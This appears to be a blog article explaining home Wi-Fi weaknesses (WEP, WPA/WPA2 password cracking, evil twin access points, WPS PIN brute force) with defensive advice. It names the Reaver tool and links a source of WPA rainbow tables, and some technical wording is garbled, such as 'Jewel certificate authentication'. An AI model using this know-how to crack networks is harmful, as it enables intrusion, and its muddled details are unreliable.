Protect Your Wi-Fi Network With This Simple Technique
WEP, WPA and WPA2 in a Nutshell
Wired Equivalent Privacy (WEP) is a security protocol created to provide a wireless local area network (WLAN) with a level of security and privacy akin to what is expected of a wired local area network (LAN). Wi-Fi Protected Access (WPA) is a security standard for users of devices equipped with wireless internet connections. WPA was developed to provide enhanced encryption and improved end-user authentication than WEP. Wi-Fi Protected Access 2 (WPA2) is a security protocol and security certification program developed by the Wi-Fi Alliance to secure wireless computer networks.
WEP has a tremendous number of security flaws. If you use WEP on your Wi-Fi, your password can be cracked in a matter of seconds. The three core deficiencies of WEP includes;
· Use of static encryption keys — No session keys, weak RC4 used, same password:
· Lack of integrity assurance — Bits can be changed:
· The ineffective use of initialization vectors (IVs) — IVs not random enough, only 24-bits, IVs with the same key, crackable in seconds.
Both WPA and WPA2 handshakes are susceptible to dictionary attacks and brute force password guessing of the pre-shared key. For this reason, pre-shared keys or the Wi-Fi password needs to be very complex and long since they are only entered once per device. Password complexity is the main mitigation against password guessing dictionary brute force attacks.
An attacker can setup an evil twin (i.e. an access point or a wireless access) with an SSID or network name that is the same as the real Wi-Fi network that you connect to. Because it has the same name, your devices would automatically connect to it instead of the real one due to a stronger signal. This is essentially a “Man in The Middle Attack” (MITM attack). If your traffic isn’t encrypted, the attacker would be able to see it and inject into it and probably do a lot of damage. Evil twin access points are a hard attack to mitigate against. To mitigate the evil twin attack, it is important to authenticate the access point using WPA2 enterprise with EAP and using a method like Jewel certificate authentication for access point authentication. This is because the access point is being authenticated to the client as well as the client authenticating to the access point. If the access point is authenticated to the client the client cannot be fooled into thinking or connecting to an evil twin.
The evil twin attack is a very common attack because it’s easier for hackers than trying to crack your Wi-Fi password. VPNs are extremely required on untrusted networks.
There is also a weakness with the salt in both WPA and WPA2. Both use the SSID as the salt value. The SSID is a synonym for the network name. The SSID should be random values that are added to the encryption process for more complexity and randomness. The use of a salt means that the same password can be encrypted into several thousand different formats; this makes it much more difficult for an attacker to cover the right format for your system. Access points with common SSIDs are more vulnerable to password guessing and dictionary attacks.
Hackers can pre-compute common passwords against or with common SSIDs to make password cracking faster are these are referred to as rainbow tables. Hackers don’t need to pre-compute them, but download them from websites like https://www.renderlab.net/projects/WPA-tables/
Wi-Fi Protected Setup (WPS)
One of the ways to setup a WPS is to enter a short pin number instead of a password to gain access into your Wi-Fi network. Such pin numbers are read either from a sticker or at the back of a wireless device. Many routers have WPS pin enabled by default. The vulnerability of WPS pin allows an attacker to remotely recover the WPS pin in a few hours with a brute force attack. When the WPS pin can be recovered, the attacker can then obtain the WPA or WPA2 pre-shared key or password. A tool in Kali Linux called “Reaver” can be used to carry out a WPS pin brute force attack. Therefore, WPS must be turned off. However, this is one of the reasons to have a custom firmware as some routers does not allow users to turn off the WPS feature.
